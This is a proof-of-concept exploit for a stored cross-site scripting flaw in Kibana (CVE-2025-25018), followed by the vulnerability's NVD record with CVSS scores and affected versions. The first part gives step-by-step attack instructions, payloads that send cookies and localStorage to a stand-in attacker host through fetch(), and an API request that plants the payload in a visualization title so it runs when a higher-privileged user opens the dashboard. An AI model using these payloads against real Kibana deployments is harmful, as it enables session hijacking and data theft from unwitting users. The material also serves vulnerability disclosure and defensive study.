CVE-2025-25018

<!-- CVE-2025-25018 - Kibana Stored XSS PoC Vulnerability: Improper Neutralization of Input During Web Page Generation Tested on Kibana versions prior to 8.18.8, 8.19.5, 9.0.8, 9.1.5 --> // Step 1: Attacker logs into Kibana with low-privilege account // Step 2: Inject malicious payload into a vulnerable input field // Example payload for visualization title or dashboard description: var maliciousPayload = '<img src=x onerror="fetch(\'http://attacker.com/steal?cookie=\'+document.cookie)">'; // Alternative payloads: var payload2 = '<svg onload="javascript:fetch(\'http://attacker.com/exfil\',{method:\'POST\',body:JSON.stringify({cookies:document.cookie,localStorage:JSON.stringify(localStorage)})})">'; // Step 3: Submit the data through Kibana API // Example: Create or update a visualization with malicious title POST /api/saved_objects/visualization/<viz-id> Content-Type: application/json { "attributes": { "title": "<img src=x onerror=\"fetch('http://attacker.com/steal?c='+document.cookie)\">", "description": "Legitimate description", "visState": "{}", "kibanaSavedObjectMeta": { "searchSourceJSON": "{}" } } } // Step 4: When a higher-privileged user views the dashboard, // the malicious script executes in their browser context // and exfiltrates sensitive data to the attacker's server.

{"cve": {"id": "CVE-2025-25018", "sourceIdentifier": "[email protected]", "published": "2025-10-10T10:15:33.743", "lastModified": "2025-10-30T14:25:55.827", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation in Kibana can lead to stored Cross-Site Scripting (XSS)"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "8.18.8", "matchCriteriaId": "DC3153A3-2F19-4238-9365-62F1CEB5BB09"}, {"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.19.0", "versionEndExcluding": "8.19.5", "matchCriteriaId": "78D0ADE9-3399-4D46-A5C0-45D6B1FF19F0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.0.0", "versionEndExcluding": "9.0.8", "matchCriteriaId": "A5D3776F-14E6-48FF-9D0B-67A772CD2D98"}, {"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.1.0", "versionEndExcluding": "9.1.5", "matchCriteriaId": "080EA14F-4F54-43C6-972C-18A40C255928"}]}]}], "references": [{"url": "https://https://discuss.elastic.co/t/kibana-8-18-8-8-19-5-9-0-8-9-1-5-security-update-esa-2025-17/382451", "source": "[email protected]", "tags": ["Broken Link", "Vendor Advisory"]}]}}